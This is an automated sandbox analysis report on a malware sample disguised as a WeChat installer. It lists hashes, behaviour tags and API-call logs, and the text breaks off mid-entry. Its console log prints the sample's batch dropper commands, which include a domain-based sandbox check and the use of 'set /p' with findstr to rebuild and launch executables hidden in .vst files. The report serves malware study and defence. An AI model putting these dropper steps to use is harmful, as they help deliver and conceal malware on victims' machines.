popup
Summary | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

wechat-35355.exe

Gen1 NPKI Generic Malware UPX Malicious Library Malicious Packer Antivirus HTTP ScreenShot Create Service KeyLogger Internet API DGA Hijack Network Http API FTP Socket Escalate priviledges DNS Code injection PWS Sniff Audio
  1. Resubmit sample
Category Machine Started Completed
FILE s1_win7_x6402 Aug. 10, 2021, 9:29 a.m. Aug. 10, 2021, 9:31 a.m.
Size 33.2MB
Type PE32 executable (GUI) Intel 80386, for MS Windows
MD5 e988d1994581870c6aac979f87ab2a5c
SHA256 794833762b3a94a9b1e88ffb915352823b7192255aa7ac86bbe9f93a64395854
CRC32 6EA537D7
ssdeep 786432:C6scxHyYirF8OUBLTEjuFrzRtIRIHc8F/ZY2axBrJ6Sy6xlvbS/d:C/cFor2NauFrzRmS88Y2KVgSXxQV
Yara
  • Malicious_Library_Zero - Malicious_Library
  • PE_Header_Zero - PE File Signature
  • IsPE32 - (no description)

Time & API Arguments Status Return Repeated

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameA

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameA

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameA

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameA

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0
Time & API Arguments Status Return Repeated

WriteConsoleW

 buffer: Microsoft Windows [Version 6.1.7601]
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: Copyright (c) 2009 Microsoft Corporation. All rights reserved.
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: C:\Users\test22\AppData\Local\Temp\7ZipSfx.000>
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: if %userdomain%==DESKTOP-QO5QU33 exit 1
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: C:\Users\test22\AppData\Local\Temp\7ZipSfx.000>
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: <nul set /p = "MZ" > Pensai.exe.com
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: C:\Users\test22\AppData\Local\Temp\7ZipSfx.000>
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: findstr /V /R "^ETrtYIGmpEuLDGoEdGacOuXIMVXhCuDbiyQQuybkrfEFDongODRpbaVnVxaeKaXewJEnPsbloismBsyDbJnYfzZOlaUMNcAKsBEUEZmbyGwdwcWDfOFwUYNHJPgvbLvN$" Magra.vst >> Pensai.exe.com"
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: C:\Users\test22\AppData\Local\Temp\7ZipSfx.000>
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: copy Portartela.vst T
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: 1 file(s) copied.
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: C:\Users\test22\AppData\Local\Temp\7ZipSfx.000>
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: start Pensai.exe.com T
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: C:\Users\test22\AppData\Local\Temp\7ZipSfx.000>
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: <nul set /p = "MZ" > Vacillavo.exe.com
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: C:\Users\test22\AppData\Local\Temp\7ZipSfx.000>
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: findstr /V /R "^ETrtYIGmpEuLDGoEdGacOuXIMVXhCuDbiyQQuybkrfEFDongODRpbaVnVxaeKaXewJEnPsbloismBsyDbJnYfzZOlaUMNcAKsBEUEZmbyGwdwcWDfOFwUYNHJPgvbLvN$" Magra.vst >> Vacillavo.exe.com"
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: C:\Users\test22\AppData\Local\Temp\7ZipSfx.000>
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: copy Dimmi.vst K
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: 1 file(s) copied.
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: C:\Users\test22\AppData\Local\Temp\7ZipSfx.000>
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: start Vacillavo.exe.com K
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: C:\Users\test22\AppData\Local\Temp\7ZipSfx.000>
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: <nul set /p = "MZ" > Naso.exe.com
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: C:\Users\test22\AppData\Local\Temp\7ZipSfx.000>
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: findstr /V /R "^ETrtYIGmpEuLDGoEdGacOuXIMVXhCuDbiyQQuybkrfEFDongODRpbaVnVxaeKaXewJEnPsbloismBsyDbJnYfzZOlaUMNcAKsBEUEZmbyGwdwcWDfOFwUYNHJPgvbLvN$" Magra.vst >> Naso.exe.com"
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: C:\Users\test22\AppData\Local\Temp\7ZipSfx.000>
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: copy Ove.vst B
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: 1 file(s) copied.
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: C:\Users\test22\AppData\Local\Temp\7ZipSfx.000>
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: start Naso.exe.com B
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: C:\Users\test22\AppData\Local\Temp\7ZipSfx.000>
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: ping 127.0.0.1 -n 30
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: C:\Users\test22\AppData\Local\Temp\7ZipSfx.000>
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: C:\Users\test22\AppData\Local\Temp\7ZipSfx.000>
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: Pinging 127.0.0.1
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: with 32 bytes of data:
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: Reply from 127.0.0.1:
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: bytes=32
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: time<1ms
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: TTL=128
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: Reply from 127.0.0.1:
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: bytes=32
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: time<1ms
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: TTL=128
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: Reply from 127.0.0.1:
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: bytes=32
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: time<1ms
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: TTL=128
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: Reply from 127.0.0.1:
console_handle: 0x00000007
1 1 0
Time & API Arguments Status Return Repeated

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x003c5f88
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x003c5f88
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x003c5fc8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002ed4a0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002ed1e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002ed1e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002ed1e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002ecde0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002ecde0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002ecde0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002ecde0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002ecde0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002ecde0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002ec8e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002ec8e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002ec8e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002ed3e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002ed3e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002ed3e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002ecfa0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002ed3e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002ed3e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002ed3e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002ed3e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002ed3e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002ed3e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002ed3e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002ed2a0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002ed2a0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002ed2a0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002ed2a0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002ed2a0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002ed2a0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002ed2a0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002ed2a0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002ed2a0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002ed2a0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002ed2a0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002ed2a0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002ed2a0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002ed2a0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002eca20
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002eca20
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002eca20
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002eca20
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002eca20
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002eca20
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002eca20
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002eca20
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00348600
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0
registry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid
registry HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\chrome.exe
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

 1 1 0
packer Armadillo v1.71
resource name AVATAR
resource name IGNORE_LIST
Time & API Arguments Status Return Repeated

__exception__

 stacktrace: 
RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x7533374b
CoReleaseServerProcess+0x73 OleSaveToStream-0xad ole32+0x64387 @ 0x76934387
NdrpMemoryIncrement+0x3d1 NdrComplexStructMarshall-0x2f rpcrt4+0x1ef51 @ 0x7532ef51
NdrPointerMarshall+0x30 NdrPointerBufferSize-0xb6 rpcrt4+0x16a9c @ 0x75326a9c
NdrPointerMarshall+0xd6 NdrPointerBufferSize-0x10 rpcrt4+0x16b42 @ 0x75326b42
NdrPointerMarshall+0x30 NdrPointerBufferSize-0xb6 rpcrt4+0x16a9c @ 0x75326a9c
NdrConformantArrayFree+0x8c NdrOleFree-0xa rpcrt4+0x35c3a @ 0x75345c3a
NdrStubCall2+0x31d NdrUnmarshallBasetypeInline-0x23a rpcrt4+0xb06b8 @ 0x753c06b8
WdtpInterfacePointer_UserUnmarshal+0x256f DllDebugObjectRPCHook-0x1e89 ole32+0x13d7e6 @ 0x76a0d7e6
WdtpInterfacePointer_UserUnmarshal+0x25ff DllDebugObjectRPCHook-0x1df9 ole32+0x13d876 @ 0x76a0d876
WdtpInterfacePointer_UserUnmarshal+0x2b59 DllDebugObjectRPCHook-0x189f ole32+0x13ddd0 @ 0x76a0ddd0
CoTaskMemFree+0x1b02 DcomChannelSetHResult-0x1c8 ole32+0x58a43 @ 0x76928a43
CoTaskMemFree+0x19f7 DcomChannelSetHResult-0x2d3 ole32+0x58938 @ 0x76928938
DcomChannelSetHResult+0x8ff CoGetObject-0x2183 ole32+0x5950a @ 0x7692950a
WdtpInterfacePointer_UserUnmarshal+0x2a56 DllDebugObjectRPCHook-0x19a2 ole32+0x13dccd @ 0x76a0dccd
WdtpInterfacePointer_UserUnmarshal+0x28ca DllDebugObjectRPCHook-0x1b2e ole32+0x13db41 @ 0x76a0db41
WdtpInterfacePointer_UserUnmarshal+0x2f86 DllDebugObjectRPCHook-0x1472 ole32+0x13e1fd @ 0x76a0e1fd
DcomChannelSetHResult+0x75c CoGetObject-0x2326 ole32+0x59367 @ 0x76929367
DcomChannelSetHResult+0x71b CoGetObject-0x2367 ole32+0x59326 @ 0x76929326
gapfnScSendMessage+0x332 GetAppCompatFlags2-0x8ea user32+0x162fa @ 0x755762fa
GetThreadDesktop+0xd7 GetWindowLongW-0x2c4 user32+0x16d3a @ 0x75576d3a
CharPrevW+0x138 TranslateMessage-0x45 user32+0x177c4 @ 0x755777c4
DispatchMessageW+0xf GetMessageW-0x58 user32+0x1788a @ 0x7557788a
CoWaitForMultipleHandles+0x4311 CoRegisterSurrogateEx-0x2fe ole32+0x1a48b @ 0x768ea48b
CoWaitForMultipleHandles+0x23c1 CoRegisterSurrogateEx-0x224e ole32+0x1853b @ 0x768e853b
CoWaitForMultipleHandles+0x4332 CoRegisterSurrogateEx-0x2dd ole32+0x1a4ac @ 0x768ea4ac
CoGetTreatAsClass+0x2619 CoRegisterChannelHook-0x1269 ole32+0x2cd48 @ 0x768fcd48
CoGetTreatAsClass+0x314b CoRegisterChannelHook-0x737 ole32+0x2d87a @ 0x768fd87a
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x76a433ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77b19ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77b19ea5

exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b
exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727
exception.instruction: leave
exception.module: KERNELBASE.dll
exception.exception_code: 0x80040155
exception.offset: 46887
exception.address: 0x7566b727
registers.esp: 37940680
registers.edi: 4345012
registers.eax: 37940680
registers.ebp: 37940760
registers.edx: 50
registers.ebx: 37941044
registers.esi: 2147746133
registers.ecx: 4118472
1 0 0

__exception__

 stacktrace: 
RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x7533374b
DllDebugObjectRPCHook+0xb6 HACCEL_UserFree-0x57 ole32+0x13f725 @ 0x76a0f725
NdrPointerFree+0x16a IUnknown_Release_Proxy-0x5a rpcrt4+0x3414b @ 0x7534414b
ObjectStublessClient25+0x65c CoImpersonateClient-0xbc ole32+0xfe14 @ 0x768dfe14
StgGetIFillLockBytesOnFile+0x16ab5 WdtpInterfacePointer_UserSize-0xe21 ole32+0x13a338 @ 0x76a0a338
IsValidURL+0x4b8c MkParseDisplayNameEx-0x1c6a4 urlmon+0x4e99f @ 0x76fbe99f
IntlPercentEncodeNormalize+0x1ff8 CoInternetCombineIUri-0x940 urlmon+0x272ed @ 0x76f972ed
RegisterBindStatusCallback+0x40d9 CopyBindInfo-0xbe4 urlmon+0x1ab0d @ 0x76f8ab0d
IsValidURL+0x2235 MkParseDisplayNameEx-0x1effb urlmon+0x4c048 @ 0x76fbc048
RegisterBindStatusCallback+0x1dc3 CopyBindInfo-0x2efa urlmon+0x187f7 @ 0x76f887f7
RegisterBindStatusCallback+0x1ef2 CopyBindInfo-0x2dcb urlmon+0x18926 @ 0x76f88926
RevokeBindStatusCallback+0x13ad CreateURLMoniker-0x4b1 urlmon+0x1d55e @ 0x76f8d55e
IsValidURL+0x2638 MkParseDisplayNameEx-0x1ebf8 urlmon+0x4c44b @ 0x76fbc44b
RevokeBindStatusCallback+0x1045 CreateURLMoniker-0x819 urlmon+0x1d1f6 @ 0x76f8d1f6
RevokeBindStatusCallback+0xffb CreateURLMoniker-0x863 urlmon+0x1d1ac @ 0x76f8d1ac
RevokeBindStatusCallback+0x125a CreateURLMoniker-0x604 urlmon+0x1d40b @ 0x76f8d40b
RegisterBindStatusCallback+0x2ee7 CopyBindInfo-0x1dd6 urlmon+0x1991b @ 0x76f8991b
RegisterBindStatusCallback+0x2333 CopyBindInfo-0x298a urlmon+0x18d67 @ 0x76f88d67
RegisterBindStatusCallback+0x36a4 CopyBindInfo-0x1619 urlmon+0x1a0d8 @ 0x76f8a0d8
RegisterBindStatusCallback+0x3151 CopyBindInfo-0x1b6c urlmon+0x19b85 @ 0x76f89b85
RegisterBindStatusCallback+0x3074 CopyBindInfo-0x1c49 urlmon+0x19aa8 @ 0x76f89aa8
DllRegisterServer+0x14b2 msxml3+0x46f4f @ 0x72c66f4f
DllRegisterServer+0x13a3 msxml3+0x46e40 @ 0x72c66e40
DllGetClassObject+0x3536b DllCanUnloadNow-0x1017 msxml3+0x427a4 @ 0x72c627a4
DllGetClassObject+0x35219 DllCanUnloadNow-0x1169 msxml3+0x42652 @ 0x72c62652
DllGetClassObject+0x35104 DllCanUnloadNow-0x127e msxml3+0x4253d @ 0x72c6253d
DllGetClassObject+0x34fd8 DllCanUnloadNow-0x13aa msxml3+0x42411 @ 0x72c62411
DllGetClassObject+0x35172 DllCanUnloadNow-0x1210 msxml3+0x425ab @ 0x72c625ab
wmic+0x39c80 @ 0xce9c80
wmic+0x3b06a @ 0xceb06a
wmic+0x3b1f8 @ 0xceb1f8
wmic+0x36fcd @ 0xce6fcd
wmic+0x3d6e9 @ 0xced6e9
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x76a433ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77b19ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77b19ea5

exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b
exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727
exception.instruction: leave
exception.module: KERNELBASE.dll
exception.exception_code: 0x80040155
exception.offset: 46887
exception.address: 0x7566b727
registers.esp: 1239936
registers.edi: 1989278224
registers.eax: 1239936
registers.ebp: 1240016
registers.edx: 1
registers.ebx: 4088180
registers.esi: 2147746133
registers.ecx: 2401417897
1 0 0
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

 process_identifier: 1764
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73f62000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 1764
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73fe3000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2420
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73f62000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 1612
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73f62000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 1088
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73f62000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2312
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73f62000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2312
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73fe3000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2312
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x03a80000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 456
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73f62000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2912
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73f62000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2912
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x036e0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2948
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73f62000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 1424
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73f62000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1424
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x01070000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 1852
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x725e2000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1852
region_size: 786432
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00860000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1852
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
